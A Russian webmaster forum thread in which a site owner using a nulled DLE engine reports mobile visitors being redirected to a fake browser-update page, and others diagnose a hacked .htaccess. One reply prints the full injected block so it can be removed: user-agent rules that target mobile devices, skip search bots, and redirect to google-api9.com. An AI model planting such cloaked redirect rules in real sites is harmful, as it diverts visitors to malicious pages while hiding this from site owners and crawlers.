X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Сайт с мобильной версии, Редирект? Вирус?
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:22; Ответить: Gera
Сообщение #1


Доброго времени суток smile.gif

Вот пациент: WinAdm.com

Проблема: раньше заходил на свой сайт с телефона, хоть он и отображался коряво, но отображался smile.gif Вот сегодня решил настроить корректное отображение его с мобильно версии, включил у себя на телефоне приложение Opera (раньше так и делал), открываю сайт, а меня перекидывает на страницу google-api9.com (там ещё разные символов в конце URL, после слеша) и требует обновить версию браузера до 7.0.

Хорошо, решил зайти через стандартный Интернет браузер в телефоне, тоже самое. Вот теперь сижу и думаю, что это может быть? Проверил сайт через различные сервисы, вирусов не находит.

Может быть, кто-нибудь сталкивался с подобным? Как быть? excl.gif


--------------------
Мой YouTube канал, где я рисую картины баллончиками в стиле Spray Paint Art и обучаю этому ТЫК
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
wasley
wasley
сообщение 22.10.2012, 23:32; Ответить: wasley
Сообщение #2


Вирус. Скорее всего в файле .htaccess . Надо его почистить


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:35; Ответить: falken
Сообщение #3


Дайк угадаю: движок DLE нулёдный?


--------------------
🗹 Быстрый и надежный хостинг от 135 рублей


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:36; Ответить: Gera
Сообщение #4


(falken @ 22.10.2012, 23:35) *
Вирус. Скорее всего в файле .htaccess . Надо его почистить

Это точно вирус?

(falken @ 22.10.2012, 23:35) *
Дайк угадаю: движок DLE нулёдный?

Всё верно smile.gif


--------------------
Мой YouTube канал, где я рисую картины баллончиками в стиле Spray Paint Art и обучаю этому ТЫК
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:41; Ответить: falken
Сообщение #5


Gera, тут 2 варианта:
- купить лицензию
- чистить ручками

Возможно ломанули, но маловероятно. Нынче любят особенно в нуледные длешки подобную муть запихивать.

Сообщение отредактировал falken - 22.10.2012, 23:44


--------------------
🗹 Быстрый и надежный хостинг от 135 рублей
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:48; Ответить: Gera
Сообщение #6


falken, скорее всего, ломанули, т.к. раньше подобного не замечал, сейчас буду смотреть. Зашел через ftp и вижу, что папки Bаckup, language, templates и файл .htaccess дата изменения стоит одна и та же, а именно 20.10.2012 в 02:38, хотя в этот день, насколько я помню, я не мог зайти, уезжал...

P.S. Сколько стоит лицензия DLE?


--------------------
Мой YouTube канал, где я рисую картины баллончиками в стиле Spray Paint Art и обучаю этому ТЫК
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Леффан
Леффан
сообщение 22.10.2012, 23:57; Ответить: Леффан
Сообщение #7


http://dle-news.ru/price.html
Скиньте свой файл .htaccess сюда, в тему. У меня такое тоже было.
Самое главное, что вредоносный код был в самом конце. То есть много-много пропусков строки, и там глубоко был код редиректа мобильного траффика smile.gif


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:57; Ответить: falken
Сообщение #8


(Gera @ 22.10.2012, 23:48) *
а именно 20.10.2012 в 02:38, хотя в этот день, насколько я помню, я не мог зайти, уезжал...

Видимо да, взлом.

(Gera @ 22.10.2012, 23:48) *
Сколько стоит лицензия DLE?

Базовая - 59$
Расширенная - 78$
Продление - 39$

Все на год, естественно. Подробней можете почитать на официальном сайте.


--------------------
🗹 Быстрый и надежный хостинг от 135 рублей


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 23.10.2012, 0:31; Ответить: Gera
Сообщение #9


Леффан, вот мой файл .htaccess

Сейчас посмотрел все папки, которые были изменены в одно и тоже время и заметил, что в каждой из них загружен этот же файл .haccess !!!

Сейчас посмотрел все мои сайты, оказывается на всех моих сайтах был изменен файл .htaccess в это же время...

Сообщение отредактировал Gera - 23.10.2012, 0:12
Прикрепленные файлы
Прикрепленный файл  htaccess.txt ( 12,49 килобайт ) Кол-во скачиваний: 103
 


--------------------
Мой YouTube канал, где я рисую картины баллончиками в стиле Spray Paint Art и обучаю этому ТЫК
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
baskin_BR
baskin_BR
сообщение 23.10.2012, 0:55; Ответить: baskin_BR
Сообщение #10


ваш файл не скачивается.
в-общем, удаляйте такой код:
Развернуть/Свернуть
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://google-api9.com/l.php?l=o___&r=___&a=___ [L,R=302]


также советую завести себе айболита: http://www.revisium.com/ai/ - поможет найти шелл на сайте(ах).
после этого меняйте пароли (ВСЕ!), закрывайте дыру, через которую был залит дор и еще раз смените пароли (!)
и лицензия на DLE - не панацея от бед, т.к. можно попасть через хостинг на сайт, не обязательно через движок

Сообщение отредактировал baskin_BR - 23.10.2012, 1:00


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
23 hollywooduk 5089 Вчера, 10:43
автор: hollywooduk
Открытая тема (нет новых ответов) Тысячи ботовых переходов на сайт
18 Suagaring 4536 26.3.2024, 21:42
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Блог: городской сми сайт в Прибалтике
23 kapusta1 3522 24.3.2024, 22:02
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
238 FillPlay 179377 23.3.2024, 16:31
автор: freeax
Открытая тема (нет новых ответов) Пишет кто отзывы на сайт в янднекс с разных аккаунтах
1 TenDemon_rs 1126 22.3.2024, 13:18
автор: writer80


 



RSS Текстовая версия Сейчас: 28.3.2024, 12:14
Дизайн